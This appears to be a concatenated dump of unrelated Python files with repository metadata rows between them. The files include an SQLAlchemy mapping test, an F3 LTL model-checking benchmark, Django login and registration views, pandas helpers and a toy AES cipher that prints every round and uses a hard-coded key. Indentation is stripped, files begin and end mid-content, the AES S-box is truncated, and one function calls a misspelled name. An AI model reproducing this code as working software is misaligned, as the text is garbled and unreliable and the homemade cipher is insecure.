__dialect__ = "default"
def test_employee_joined_inh(self, decl_base: Type[DeclarativeBase]):
str50 = Annotated[str, 50]
str30 = Annotated[str, 30]
opt_str50 = Optional[str50]
decl_base.registry.update_type_annotation_map(
{str50: String(50), str30: String(30)}
)
class Company(decl_base):
__tablename__ = "company"
company_id: Mapped[int] = mapped_column(Integer, primary_key=True)
name: Mapped[str50]
employees: Mapped[Set["Person"]] = relationship() # noqa F821
class Person(decl_base):
__tablename__ = "person"
person_id: Mapped[int] = mapped_column(primary_key=True)
company_id: Mapped[int] = mapped_column(
ForeignKey("company.company_id")
)
name: Mapped[str50]
type: Mapped[str30] = mapped_column()
__mapper_args__ = {"polymorphic_on": type}
class Engineer(Person):
__tablename__ = "engineer"
person_id: Mapped[int] = mapped_column(
ForeignKey("person.person_id"), primary_key=True
)
status: Mapped[str] = mapped_column(String(30))
engineer_name: Mapped[opt_str50]
primary_language: Mapped[opt_str50]
class Manager(Person):
__tablename__ = "manager"
person_id: Mapped[int] = mapped_column(
ForeignKey("person.person_id"), primary_key=True
)
status: Mapped[str] = mapped_column(String(30))
manager_name: Mapped[str50]
is_(Person.__mapper__.polymorphic_on, Person.__table__.c.type)
# the SELECT statements here confirm the columns present and their
# ordering
self.assert_compile(
select(Person),
"SELECT person.person_id, person.company_id, person.name, "
"person.type FROM person",
)
self.assert_compile(
select(Manager),
"SELECT manager.person_id, person.person_id AS person_id_1, "
"person.company_id, person.name, person.type, manager.status, "
"manager.manager_name FROM person "
"JOIN manager ON person.person_id = manager.person_id",
)
self.assert_compile(
select(Company).join(Company.employees.of_type(Engineer)),
"SELECT company.company_id, company.name FROM company JOIN "
"(person JOIN engineer ON person.person_id = engineer.person_id) "
"ON company.company_id = person.company_id",
)
| 33.390848
| 79
| 0.592086
|
a3df0f2f7c69c4185647f82d458eadb5b3088c43
| 9,978
|
py
|
Python
|
benchmarks/f3_wrong_hints/scaling_ltl_infinite_state/17-extending_bound_34.py
|
EnricoMagnago/F3
|
c863215c318d7d5f258eb9be38c6962cf6863b52
|
[
"MIT"
] | 3
|
2021-04-23T23:29:26.000Z
|
2022-03-23T10:00:30.000Z
|
benchmarks/f3_wrong_hints/scaling_ltl_infinite_state/17-extending_bound_34.py
|
EnricoMagnago/F3
|
c863215c318d7d5f258eb9be38c6962cf6863b52
|
[
"MIT"
] | null | null | null |
benchmarks/f3_wrong_hints/scaling_ltl_infinite_state/17-extending_bound_34.py
|
EnricoMagnago/F3
|
c863215c318d7d5f258eb9be38c6962cf6863b52
|
[
"MIT"
] | 1
|
2021-11-17T22:02:56.000Z
|
2021-11-17T22:02:56.000Z
|
from typing import Tuple, FrozenSet
from collections import Iterable
from mathsat import msat_term, msat_env
from mathsat import msat_make_constant, msat_declare_function
from mathsat import msat_get_integer_type, msat_get_rational_type, msat_get_bool_type
from mathsat import msat_make_and, msat_make_not, msat_make_or
from mathsat import msat_make_leq, msat_make_equal
from mathsat import msat_make_number, msat_make_plus
from pysmt.environment import Environment as PysmtEnv
import pysmt.typing as types
from ltl.ltl import TermMap, LTLEncoder
from utils import name_next, symb_to_next
from hint import Hint, Location
def msat_make_lt(menv: msat_env, arg0: msat_term, arg1: msat_term):
geq = msat_make_geq(menv, arg0, arg1)
return msat_make_not(menv, geq)
def msat_make_geq(menv: msat_env, arg0: msat_term, arg1: msat_term):
return msat_make_leq(menv, arg1, arg0)
def msat_make_gt(menv: msat_env, arg0: msat_term, arg1: msat_term):
leq = msat_make_leq(menv, arg0, arg1)
return msat_make_not(menv, leq)
def msat_make_impl(menv: msat_env, arg0: msat_term, arg1: msat_term):
n_arg0 = msat_make_not(menv, arg0)
return msat_make_or(menv, n_arg0, arg1)
def check_ltl(menv: msat_env, enc: LTLEncoder) -> Tuple[Iterable, msat_term,
msat_term, msat_term]:
assert menv
assert isinstance(menv, msat_env)
assert enc
assert isinstance(enc, LTLEncoder)
bool_type = msat_get_bool_type(menv)
real_type = msat_get_rational_type(menv)
i = msat_declare_function(menv, "i", real_type)
i = msat_make_constant(menv, i)
r = msat_declare_function(menv, "r", real_type)
r = msat_make_constant(menv, r)
l = msat_declare_function(menv, "l", real_type)
l = msat_make_constant(menv, l)
inc_i = msat_declare_function(menv, "inc_i", bool_type)
inc_i = msat_make_constant(menv, inc_i)
x_i = msat_declare_function(menv, name_next("i"), real_type)
x_i = msat_make_constant(menv, x_i)
x_r = msat_declare_function(menv, name_next("r"), real_type)
x_r = msat_make_constant(menv, x_r)
x_l = msat_declare_function(menv, name_next("l"), real_type)
x_l = msat_make_constant(menv, x_l)
x_inc_i = msat_declare_function(menv, name_next("inc_i"), bool_type)
x_inc_i = msat_make_constant(menv, x_inc_i)
curr2next = {i: x_i, r: x_r, l: x_l, inc_i: x_inc_i}
zero = msat_make_number(menv, "0")
one = msat_make_number(menv, "1")
r_gt_0 = msat_make_gt(menv, r, zero)
r_lt_l = msat_make_lt(menv, r, l)
i_geq_0 = msat_make_geq(menv, i, zero)
init = msat_make_and(menv, r_gt_0, r_lt_l)
init = msat_make_and(menv, init,
msat_make_and(menv, i_geq_0,
msat_make_not(menv, inc_i)))
init = msat_make_and(menv, init, msat_make_gt(menv, l, zero))
# r' = r
trans = msat_make_equal(menv, x_r, r)
# i < l -> ((inc_i' & i' = i + 1) | (!inc_i' & i' = i)) & l' = l
i_lt_l = msat_make_lt(menv, i, l)
x_i_eq_i_p_1 = msat_make_and(menv, x_inc_i,
msat_make_equal(menv, x_i,
msat_make_plus(menv, i, one)))
x_i_eq_i = msat_make_and(menv, msat_make_not(menv, x_inc_i),
msat_make_equal(menv, x_i, i))
x_i_eq_i_p_1_or_i = msat_make_or(menv, x_i_eq_i_p_1, x_i_eq_i)
x_l_eq_l = msat_make_equal(menv, x_l, l)
x_i_eq_i_p_1_or_i_and_x_l_eq_l = msat_make_and(menv, x_i_eq_i_p_1_or_i,
x_l_eq_l)
trans = msat_make_and(menv, trans,
msat_make_impl(menv, i_lt_l,
x_i_eq_i_p_1_or_i_and_x_l_eq_l))
# i >= l -> i' = 0 & l' = l + 1 & !inc_i'
i_geq_l = msat_make_geq(menv, i, l)
x_i_eq_0 = msat_make_equal(menv, x_i, zero)
x_l_eq_l_p_1 = msat_make_equal(menv, x_l, msat_make_plus(menv, l, one))
x_i_eq_0_and_x_l_eq_l_p_1 = msat_make_and(menv,
msat_make_and(menv, x_i_eq_0,
x_l_eq_l_p_1),
msat_make_not(menv, x_inc_i))
trans = msat_make_and(menv, trans,
msat_make_impl(menv, i_geq_l,
x_i_eq_0_and_x_l_eq_l_p_1))
# (G F inc_i) -> ! G F r > i
G_F_x_i_gt_i = enc.make_G(enc.make_F(inc_i))
r_gt_i = msat_make_gt(menv, r, i)
n_G_F_r_gt_i = msat_make_not(menv, enc.make_G(enc.make_F(r_gt_i)))
ltl = msat_make_impl(menv, G_F_x_i_gt_i, n_G_F_r_gt_i)
return TermMap(curr2next), init, trans, ltl
def hints(env: PysmtEnv) -> FrozenSet[Hint]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
i = mgr.Symbol("i", types.REAL)
r = mgr.Symbol("r", types.REAL)
l = mgr.Symbol("l", types.REAL)
inc_i = mgr.Symbol("inc_i", types.BOOL)
symbs = frozenset([i, r, l, inc_i])
x_i = symb_to_next(mgr, i)
x_r = symb_to_next(mgr, r)
x_l = symb_to_next(mgr, l)
x_inc_i = symb_to_next(mgr, inc_i)
res = []
n0 = mgr.Real(0)
n1 = mgr.Real(1)
stutter = mgr.Equals(x_i, i)
loc = Location(env, mgr.GE(i, n0), stutterT=stutter)
loc.set_progress(0, mgr.Equals(x_i, mgr.Plus(i, n1)))
h_i = Hint("h_i0", env, frozenset([i]), symbs)
h_i.set_locs([loc])
res.append(h_i)
loc = Location(env, mgr.GE(r, n0))
loc.set_progress(0, mgr.Equals(x_r, mgr.Plus(r, n1)))
h_r = Hint("h_r0", env, frozenset([r]), symbs)
h_r.set_locs([loc])
res.append(h_r)
loc = Location(env, inc_i)
loc.set_progress(0, x_inc_i)
h_inc = Hint("h_inc0", env, frozenset([inc_i]), symbs)
h_inc.set_locs([loc])
res.append(h_inc)
stutter = mgr.Equals(x_i, i)
loc = Location(env, mgr.LE(i, n0), stutterT=stutter)
loc.set_progress(0, mgr.Equals(x_i, mgr.Minus(i, n1)))
h_i = Hint("h_i1", env, frozenset([i]), symbs)
h_i.set_locs([loc])
res.append(h_i)
loc = Location(env, mgr.LE(r, n0))
loc.set_progress(0, mgr.Equals(x_r, mgr.Minus(r, n1)))
h_r = Hint("h_r1", env, frozenset([r]), symbs)
h_r.set_locs([loc])
res.append(h_r)
loc = Location(env, mgr.LE(l, n0))
loc.set_progress(0, mgr.Equals(x_l, mgr.Minus(l, n1)))
h_l = Hint("h_l1", env, frozenset([l]), symbs)
h_l.set_locs([loc])
res.append(h_l)
loc = Location(env, mgr.Not(inc_i))
loc.set_progress(0, mgr.Not(x_inc_i))
h_inc = Hint("h_inc1", env, frozenset([inc_i]), symbs)
h_inc.set_locs([loc])
res.append(h_inc)
loc0 = Location(env, mgr.GE(i, n0))
loc0.set_progress(1, mgr.Equals(x_i, mgr.Plus(i, n1)))
loc1 = Location(env, mgr.GE(i, n0))
loc1.set_progress(0, mgr.Equals(x_i, i))
h_i = Hint("h_i2", env, frozenset([i]), symbs)
h_i.set_locs([loc0, loc1])
res.append(h_i)
loc0 = Location(env, mgr.GE(r, n0))
loc0.set_progress(1, mgr.Equals(x_r, r))
loc1 = Location(env, mgr.GE(r, n0))
loc1.set_progress(0, mgr.Equals(x_r, mgr.Plus(r, n1)))
h_r = Hint("h_r2", env, frozenset([r]), symbs)
h_r.set_locs([loc0, loc1])
res.append(h_r)
loc0 = Location(env, mgr.GE(l, n0))
loc0.set_progress(1, mgr.Equals(x_l, mgr.Plus(l, n1)))
loc1 = Location(env, mgr.GE(l, n0))
loc1.set_progress(0, mgr.Equals(x_l, l))
h_l = Hint("h_l2", env, frozenset([l]), symbs)
h_l.set_locs([loc0, loc1])
res.append(h_l)
loc0 = Location(env, mgr.Not(inc_i))
loc0.set_progress(1, x_inc_i)
loc1 = Location(env, inc_i)
loc1.set_progress(0, mgr.Not(x_inc_i))
h_inc = Hint("h_inc2", env, frozenset([inc_i]), symbs)
h_inc.set_locs([loc0, loc1])
res.append(h_inc)
loc0 = Location(env, mgr.GE(r, n0), mgr.GE(i, n0),
stutterT=mgr.Equals(x_r, mgr.Plus(r, i)))
loc0.set_progress(1, mgr.Equals(x_r, r))
loc1 = Location(env, mgr.GE(r, n0))
loc1.set_progress(0, mgr.Equals(x_r, mgr.Plus(r, n1)))
h_r = Hint("h_r3", env, frozenset([r]), symbs)
h_r.set_locs([loc0, loc1])
res.append(h_r)
loc0 = Location(env, mgr.Not(inc_i))
loc0.set_progress(1, x_inc_i)
loc1 = Location(env, inc_i, stutterT=x_inc_i)
loc1.set_progress(0, mgr.Not(x_inc_i))
h_inc = Hint("h_inc3", env, frozenset([inc_i]), symbs)
h_inc.set_locs([loc0, loc1])
res.append(h_inc)
loc0 = Location(env, mgr.GE(i, n0))
loc0.set_progress(1, mgr.Equals(x_i, mgr.Plus(i, n1)))
loc1 = Location(env, mgr.GE(i, n0))
loc1.set_progress(2, mgr.Equals(x_i, i))
loc2 = Location(env, mgr.GE(i, n0))
loc2.set_progress(0, mgr.Equals(x_i, i))
h_i = Hint("h_i4", env, frozenset([i]), symbs)
h_i.set_locs([loc0, loc1, loc2])
res.append(h_i)
loc0 = Location(env, mgr.GE(r, n0))
loc0.set_progress(1, mgr.Equals(x_r, r))
loc1 = Location(env, mgr.GE(r, n0))
loc1.set_progress(2, mgr.Equals(x_r, mgr.Plus(r, n1)))
loc2 = Location(env, mgr.GE(r, n0))
loc2.set_progress(0, mgr.Equals(x_r, r))
h_r = Hint("h_r4", env, frozenset([r]), symbs)
h_r.set_locs([loc0, loc1, loc2])
res.append(h_r)
loc0 = Location(env, mgr.GE(l, n0))
loc0.set_progress(1, mgr.Equals(x_l, mgr.Plus(l, n1)))
loc1 = Location(env, mgr.GE(l, n0))
loc1.set_progress(2, mgr.Equals(x_l, l))
loc2 = Location(env, mgr.GE(l, n0))
loc2.set_progress(0, mgr.Equals(x_l, l))
h_l = Hint("h_l4", env, frozenset([l]), symbs)
h_l.set_locs([loc0, loc1, loc2])
res.append(h_l)
loc0 = Location(env, mgr.Not(inc_i))
loc0.set_progress(1, x_inc_i)
loc1 = Location(env, inc_i, stutterT=x_inc_i)
loc1.set_progress(2, mgr.Not(x_inc_i))
loc2 = Location(env, mgr.Not(inc_i))
loc2.set_progress(0, mgr.Not(x_inc_i))
h_inc = Hint("h_inc4", env, frozenset([inc_i]), symbs)
h_inc.set_locs([loc0, loc1, loc2])
res.append(h_inc)
return frozenset(res)
| 35.133803
| 89
| 0.62738
|
f1b094dabab78ac45c6dea377c936f76636c9199
| 1,244
|
py
|
Python
|
src/yativ/scale.py
|
Ahuge/yativ
|
506511c9f5c6d77c6e488f6f593044b78541cfb5
|
[
"MIT"
] | null | null | null |
src/yativ/scale.py
|
Ahuge/yativ
|
506511c9f5c6d77c6e488f6f593044b78541cfb5
|
[
"MIT"
] | null | null | null |
src/yativ/scale.py
|
Ahuge/yativ
|
506511c9f5c6d77c6e488f6f593044b78541cfb5
|
[
"MIT"
] | null | null | null |
import numpy
def scale(input, float_factor):
def downsize(factor):
new_arr = []
for row_index_mult, _ in enumerate(input[::factor]):
new_arr.append([])
for col_index_mult, _ in enumerate(input[0][::factor]):
values = []
for row_factor_index in range(int(factor)):
ri = (row_index_mult*factor)+row_factor_index
if ri < len(input):
row = input[ri]
for col_factor_index in range(int(factor)):
ci = (col_index_mult*factor)+col_factor_index
if ci < len(row):
cell = row[ci]
values.append(cell)
if values:
new_arr[-1].append(sum(values)/len(values))
return numpy.asarray(new_arr)
def upscale(factor):
raise NotImplementedError("Upscaling is not yet implemented!")
if float_factor == 1:
return input
elif float_factor > 1:
# print("Scaling %s to %s" % (input.shape[0], input.shape[0]/factor))
return downsize(int(float_factor))
else:
return upscale(float_factor)
| 36.588235
| 77
| 0.515273
|
27259f19c85cb2823b24fb37ca140ea2a132cc06
| 878
|
py
|
Python
|
paddlespatial/utils/__init__.py
|
PaddlePaddle/PaddleSpatial
|
71e5918b0af9e9640e08901e5e95751b093a40dc
|
[
"Apache-2.0"
] | 38
|
2021-07-12T15:07:02.000Z
|
2022-03-10T12:07:15.000Z
|
paddlespatial/utils/__init__.py
|
PaddlePaddle/PaddleSpatial
|
71e5918b0af9e9640e08901e5e95751b093a40dc
|
[
"Apache-2.0"
] | 3
|
2022-03-08T10:54:29.000Z
|
2022-03-30T07:19:05.000Z
|
paddlespatial/utils/__init__.py
|
PaddlePaddle/PaddleSpatial
|
71e5918b0af9e9640e08901e5e95751b093a40dc
|
[
"Apache-2.0"
] | 2
|
2021-12-07T06:47:16.000Z
|
2022-02-14T01:43:41.000Z
|
#!/usr/bin/python
#coding=utf-8
################################################################################
#
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
"""
Brief:
Author: zhoujingbo@baidu.com
Date: 2021-10-29 00:18:52
"""
| 33.769231
| 80
| 0.609339
|
e84718556075a03709f91b370f29e2db26f3e99c
| 447
|
py
|
Python
|
lambdata_andrea/__init__.py
|
supai-red/lambdata_AC
|
5c2655b483c01c3386cf79960bcc6a8a9a57c443
|
[
"MIT"
] | null | null | null |
lambdata_andrea/__init__.py
|
supai-red/lambdata_AC
|
5c2655b483c01c3386cf79960bcc6a8a9a57c443
|
[
"MIT"
] | 4
|
2020-03-24T18:06:43.000Z
|
2021-06-02T00:49:58.000Z
|
lambdata_andrea/__init__.py
|
supai-red/lambdata_AC
|
5c2655b483c01c3386cf79960bcc6a8a9a57c443
|
[
"MIT"
] | null | null | null |
"""
lambdata - a collection of data science helper functions
"""
import pandas as pd
import numpy as np
def check_nulls(df):
"""A function to check for and print DataFrame nulls."""
print(df.isnull().sum().sum())
return
def list_series_df(a_list):
"""A function to turn a list, into a series, and then a DataFrame.."""
s = pd.Series(a_list)
df = pd.DataFrame(s)
print("The DataFrame is")
return df
| 24.833333
| 73
| 0.642058
|
271fe8cb4638bb263355e0c702a01f25cb73e941
| 2,188
|
py
|
Python
|
django/www/MeteoGaliciaDB/registros/views.py
|
hugo-lorenzo-mato/Meteo-Galicia-DB
|
3dd52534c16216de5f25cd40877d2facc7cffe24
|
[
"MIT"
] | null | null | null |
django/www/MeteoGaliciaDB/registros/views.py
|
hugo-lorenzo-mato/Meteo-Galicia-DB
|
3dd52534c16216de5f25cd40877d2facc7cffe24
|
[
"MIT"
] | null | null | null |
django/www/MeteoGaliciaDB/registros/views.py
|
hugo-lorenzo-mato/Meteo-Galicia-DB
|
3dd52534c16216de5f25cd40877d2facc7cffe24
|
[
"MIT"
] | 1
|
2021-04-27T18:37:41.000Z
|
2021-04-27T18:37:41.000Z
|
from django.shortcuts import render
from . import forms
from django.core.urlresolvers import reverse
from django.contrib.auth.decorators import login_required
from django.http import HttpResponse, HttpResponseRedirect
from django.contrib.auth import authenticate,login,logout
# Create your views here.
@login_required
def special(request):
return HttpResponse("Estás logueado!")
@login_required
def user_logout(request):
logout(request)
logged = False
return render(request, 'registros/login.html',{'logged':logged})
def registro(request):
registered = False
if request.method == 'POST':
user_form = forms.UserForm(data=request.POST)
profile_form = forms.UserProfileInfo(data=request.POST)
if user_form.is_valid() and profile_form.is_valid():
user = user_form.save()
user.set_password(user.password)
user.save()
profile = profile_form.save(commit=False)
profile.user = user
if 'profile_pic' in request.FILES:
profile.profile_pic = request.FILES['profile_pic']
profile.save()
registered = True
else:
print(user_form.errors,profile_form.errors)
else:
user_form = forms.UserForm()
profile_form = forms.UserProfileInfo()
return render(request,'registros/registration.html', {'registered': registered, 'user_form': user_form,'profile_form':profile_form})
def user_login(request):
logged = False
if request.method == 'POST':
username = request.POST.get('username')
password = request.POST.get('password')
user = authenticate(username=username, password=password)
if user:
if user.is_active:
login(request, user)
logged = True
return render(request, 'registros/login.html', {'logged': logged})
else:
return HttpResponse("Cuenta inactiva")
else:
print("Alguien intento loguearse y falló")
return HttpResponse("Datos de acceso inválidos")
else:
return render(request, 'registros/login.html',{'logged':logged})
| 33.151515
| 136
| 0.652194
|
5bb1a299d905125d5884457c9e08858d1b9184c9
| 13,407
|
py
|
Python
|
client_DEBUG_ROUNDS.py
|
Andrew-Wichmann/AESpy
|
0f00dfb814ef65df0a728197baa4fa60eeab7777
|
[
"MIT"
] | null | null | null |
client_DEBUG_ROUNDS.py
|
Andrew-Wichmann/AESpy
|
0f00dfb814ef65df0a728197baa4fa60eeab7777
|
[
"MIT"
] | null | null | null |
client_DEBUG_ROUNDS.py
|
Andrew-Wichmann/AESpy
|
0f00dfb814ef65df0a728197baa4fa60eeab7777
|
[
"MIT"
] | null | null | null |
import sys
import io
from BitVector import *
num_of_rounds=11
#AES modulus
modulus = BitVector( bitstring='100011011' )
#key_bitvector=BitVector(hexstring = "00000000000000000000000000000000")
#key_bitvector=BitVector(hexstring = "0f1571c947d9e8590cb7add6af7f6798")
key_bitvector = BitVector(textstring = "This is my key!!")
rcon=[BitVector(intVal = 1, size = 8), BitVector(intVal = 2,size=8), BitVector(intVal = 4, size=8), BitVector(intVal = 8,size=8), BitVector(intVal=16,size=8), BitVector(intVal = 32,size=8), BitVector(intVal = 64,size=8), BitVector(intVal = 128,size=8), BitVector(intVal = 27,size=8), BitVector(intVal = 54,size=8)]
##Initialize roundkey matrix as empty bitvectors
roundkey = [BitVector(size=128) for _ in range(num_of_rounds)]
def word_substitution(key,roud):
##Make new vector for the return
return_key = BitVector(intVal = key.intValue(), size = 32)
##Shift left one byte
return_key=return_key<<8
i=0
while i<=3:
j=i*8
k=(i+1)*8
##Get byte in integer for table lookup
tempbyte = return_key[j:k]
z = tempbyte.intValue()
##Find substitution in rijndael sbox table
subbyte = sbox[z]
##Make a bitvector out of the sbox result
temp2 = BitVector(intVal=subbyte, size=8)
##Replace the byte
return_key[j:k] = temp2
i=i+1
##Add round constant
return_key[:8]=rcon[roud-1] ^ return_key[:8]
return return_key
def key_expansion():
i=0
##First key is the original key
roundkey[0]=key_bitvector
roud=1
while roud<=(num_of_rounds-1):
##Substitute word
temp = word_substitution(roundkey[roud-1][96:128],roud)
##XOR temp with first word of previous key for word 0
roundkey[roud][:32]= temp ^ roundkey[roud-1][:32]
##XOR the previous word with previous key for word 1-3
roundkey[roud][32:64]=roundkey[roud][:32]^roundkey[roud-1][32:64]
roundkey[roud][64:96]=roundkey[roud][32:64]^roundkey[roud-1][64:96]
roundkey[roud][96:128]=roundkey[roud][64:96]^roundkey[roud-1][96:128]
##Move to the next key
roud=roud+1
def subBytes(state):
if(len(state)!=128):
print "CRITICAL ERROR: State subsitution error in subBytes: vector is incorrect length"
for x in range(16):
j=x*8
k=(x+1)*8
tempbyte = state[j:k]
z = tempbyte.intValue()
##Find substitution in rijndael sbox table
subbyte = sbox[z]
##Make a bitvector out of the sbox result
temp2 = BitVector(intVal=subbyte, size=8)
##Replace the byte
state[j:k] = temp2
return state
def shiftRows(state):
if(len(state)!=128):
print "CRITICAL ERROR: State row shift error in shiftRows: vector is incorrect length"
tempstate = state[:]
state[8:16] = tempstate[40:48]
state[16:24] = tempstate[80:88]
state[24:32] = tempstate[120:128]
state[40:48] = tempstate[72:80]
state[48:56] = tempstate[112:120]
state[56:64] = tempstate[24:32]
state[72:80] = tempstate[104:112]
state[80:88] = tempstate[16:24]
state[88:96] = tempstate[56:64]
state[104:112] = tempstate[8:16]
state[112:120] = tempstate[48:56]
state[120:128] = tempstate[88:96]
return state
def invShiftRows(state):
if(len(state)!=128):
print "CRITICAL ERROR: State row shift error in shiftRows: vector is incorrect length"
tempstate = state[:]
state[8:16] = tempstate[104:112]
state[16:24] = tempstate[80:88]
state[24:32] = tempstate[56:64]
state[40:48] = tempstate[8:16]
state[48:56] = tempstate[112:120]
state[56:64] = tempstate[88:96]
state[72:80] = tempstate[40:48]
state[80:88] = tempstate[16:24]
state[88:96] = tempstate[120:128]
state[104:112] = tempstate[72:80]
state[112:120] = tempstate[48:56]
state[120:128] = tempstate[24:32]
return state
def invMixCollumns(state):
if(len(state)!=128):
print "CRITICAL ERROR: State mix collumns error in mixCollumns: vector is incorrect length"
state[:32] = invatrixMultiplication(state[:32])
state[32:64] = invMatrixMultiplication(state[32:64])
state[64:96] = invMatrixMultiplication(state[64:96])
state[96:128] = invMatrixMultiplication(state[96:128])
return state
def invMatrixMultiplication(vector):
stateMatrix=vector[:]
stateMatrix[0:8] = modularMul(vector[0:8],"0E") ^ modularMul(vector[8:16], "0B") ^ modularMul(vector[16:24], "0D") ^ modularMul(vector[24:32], "09")
stateMatrix[8:16] = modularMul(vector[0:8],"09") ^ modularMul(vector[8:16],"0E") ^ modularMul(vector[16:24],"0B") ^ modularMul(vector[24:32],"0D")
stateMatrix[16:24] = modularMul(vector[0:8],"0D") ^ modularMul(vector[8:16],"09") ^ modularMul(vector[16:24],"0E") ^ modularMul(vector[24:32],"0B")
stateMatrix[24:32] = modularMul(vector[0:8],"0B") ^ modularMul(vector[8:16],"0D") ^ modularMul(vector[16:24],"09") ^ modularMul(vector[24:32],"0E")
return stateMatrix
def invSubBytes(state):
if(len(state)!=128):
print "CRITICAL ERROR: State subsitution error in subBytes: vector is incorrect length"
for x in range(16):
j=x*8
k=(x+1)*8
tempbyte = state[j:k]
#print "before",state[j:k].get_bitvector_in_hex()
z = tempbyte.intValue()
##Find substitution in rijndael rsbox table
subbyte = rsbox[z]
##Make a bitvector out of the sbox result
temp2 = BitVector(intVal=subbyte, size=8)
##Replace the byte
state[j:k] = temp2
#print "after:",state[j:k].get_bitvector_in_hex()
#print
return state
def modularMul(byte, hexNum):
if(type(hexNum)!=str):
print "CRITICAL ERROR: hexnum is not a string"
a = BitVector( hexstring=hexNum)
return a.gf_multiply_modular(byte, modulus, 8)
def matrixMultiplication(vector):
stateMatrix=vector[:]
stateMatrix[0:8] = modularMul(vector[0:8],"02") ^ modularMul(vector[8:16],"03") ^ vector[16:24] ^ vector[24:32]
stateMatrix[8:16] = vector[0:8] ^ modularMul(vector[8:16],"02") ^ modularMul(vector[16:24],"03") ^ vector[24:32]
stateMatrix[16:24] = vector[0:8] ^ vector[8:16] ^ modularMul(vector[16:24],"02") ^ modularMul(vector[24:32],"03")
stateMatrix[24:32] = modularMul(vector[0:8],"03") ^ vector[8:16] ^ vector[16:24] ^ modularMul(vector[24:32],"02")
return stateMatrix
def mixCollumns(state):
if(len(state)!=128):
print "State mix collumns error in mixCollumns: vector is incorrect length"
state[:32] = matrixMultiplication(state[:32])
state[32:64] = matrixMultiplication(state[32:64])
state[64:96] = matrixMultiplication(state[64:96])
state[96:128] = matrixMultiplication(state[96:128])
return state
def invMixCollumns(state):
if(len(state)!=128):
print "State mix collumns error in mixCollumns: vector is incorrect length"
state[:32] = invMatrixMultiplication(state[:32])
state[32:64] = invMatrixMultiplication(state[32:64])
state[64:96] = invMatrixMultiplication(state[64:96])
state[96:128] = invMatrixMultiplication(state[96:128])
return state
def addRoundKey(roud, state):
return state ^ roundkey[roud]
def encryption(message):
plaintext = BitVector(textstring = message)
if((len(plaintext)%128)!=0):
padlen = 128 - (len(plaintext)%128)
for _ in range(padlen/8):
padding = BitVector(intVal=(padlen/8), size=8)
plaintext = plaintext + padding
#print "Padding",plaintext.get_bitvector_in_hex()
stateMatrix = plaintext[:128]
cypher = BitVector(size=0)
block_count = 0
num_of_blocks =len(plaintext)/128
##loop until the message is all 0s
for blockNum in range(num_of_blocks):
block_count = block_count+1
stateMatrix = addRoundKey(0,stateMatrix)
i=1
while(i<num_of_rounds):
print "Encryption Block:", block_count,". Round:",i
stateMatrix = subBytes(stateMatrix)
print "Enc: after subBytes",stateMatrix.get_bitvector_in_hex()
stateMatrix = shiftRows(stateMatrix)
print "Enc: after shiftRows",stateMatrix.get_bitvector_in_hex()
if(i!=num_of_rounds-1):
stateMatrix = mixCollumns(stateMatrix)
print "Enc: after mixCollumns",stateMatrix.get_bitvector_in_hex()
stateMatrix = addRoundKey(i, stateMatrix)
print "Enc: after addRC:",i,stateMatrix.get_bitvector_in_hex()
i=i+1
cypher = cypher+stateMatrix
if(blockNum != (num_of_blocks-1)):
plaintext = plaintext[128:]
stateMatrix = plaintext[:128]
if(len(sys.argv)==3):
print "Block count",block_count
print cypher.get_bitvector_in_hex()
return cypher.get_bitvector_in_ascii()
def decryption(message):
cypher = BitVector(textstring = message)
stateMatrix = cypher[:128]
plaintext = BitVector(size=0)
block_count = 0
num_of_blocks =len(cypher)/128
##loop until the message is all 0s
for blockNum in range(num_of_blocks):
block_count = block_count+1
i=num_of_rounds-1
stateMatrix = addRoundKey(i,stateMatrix)
print "Dec: after addRC",i,stateMatrix.get_bitvector_in_hex()
i=i-1
while(i>=0):
print "Encryption Block:", block_count,". Round:",i
stateMatrix = invShiftRows(stateMatrix)
print "Dec: after InvShiftRows",stateMatrix.get_bitvector_in_hex()
stateMatrix = invSubBytes(stateMatrix)
print "Dec: after InvSubBytes",stateMatrix.get_bitvector_in_hex()
stateMatrix = addRoundKey(i, stateMatrix)
print "Dec: after addRC",i,stateMatrix.get_bitvector_in_hex()
if(i!=0):
stateMatrix = invMixCollumns(stateMatrix)
print "Dec: after mixColl",stateMatrix.get_bitvector_in_hex()
i=i-1
plaintext = plaintext+stateMatrix
if(blockNum != (num_of_blocks-1)):
cypher = cypher[128:]
stateMatrix = cypher[:128]
if(len(sys.argv)==3):
print "Block count",block_count
print plaintext.get_bitvector_in_hex()
return plaintext.get_bitvector_in_ascii()
# Rijndael S-box
sbox = [ 0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67,
0x2b, 0xfe, 0xd7, 0xab, 0x76, 0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59,
0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0, 0xb7,
0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1,
0x71, 0xd8, 0x31, 0x15, 0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05,
0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75, 0x09, 0x83,
0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29,
0xe3, 0x2f, 0x84, 0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b,
0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf, 0xd0, 0xef, 0xaa,
0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c,
0x9f, 0xa8, 0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc,
0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2, 0xcd, 0x0c, 0x13, 0xec,
0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19,
0x73, 0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee,
